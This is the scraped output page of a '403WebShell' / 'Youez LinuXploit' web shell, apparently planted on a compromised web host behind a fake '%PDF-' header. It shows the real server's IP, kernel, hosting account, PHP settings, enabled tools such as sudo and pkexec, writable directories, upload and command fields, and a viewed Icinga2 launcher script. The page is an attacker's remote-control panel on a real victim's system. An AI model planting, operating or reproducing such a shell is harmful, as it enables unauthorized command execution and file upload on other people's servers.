%PDF- %PDF- 403WebShell
403Webshell
Server IP : 79.170.40.229  /  Your IP : 3.135.208.253
Web Server : Apache
System : Linux web232.extendcp.co.uk 4.18.0-513.24.1.el8_9.x86_64 #1 SMP Mon Apr 8 11:23:13 EDT 2024 x86_64
User : 1stforcarhirealicante.com ( 296923)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/thread-self/root/usr/sbin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/usr/sbin/icinga2
#!/bin/sh
ICINGA2_BIN=/usr/lib64/icinga2/sbin/icinga2

if test "x`uname -s`" = "xLinux" -a "x$1" = "xconsole"; then
  libedit_line=`ldd $ICINGA2_BIN 2>&1 | grep libedit`
  if test $? -eq 0; then
    libedit_path=`echo $libedit_line | cut -f3 -d' '`
    if test -n "$libedit_path"; then
      libdir=`dirname -- $libedit_path`
      found=0
      for libreadline_path in `ls -1r -- $libdir/libreadline.so.* 2>/dev/null`; do
        found=1
        break
      done
      if test $found -eq 0; then
        libdir2=/`echo $libdir | cut -f3- -d/`
        for libreadline_path in `ls -1r -- $libdir2/libreadline.so.* 2>/dev/null`; do
          found=1
          break
        done
      fi
      if test $found -gt 0; then
        export LD_PRELOAD="$libreadline_path:$LD_PRELOAD"
      fi
    fi
  fi
fi

exec $ICINGA2_BIN "$@"

Youez - 2016 - github.com/yon3zu
LinuXploit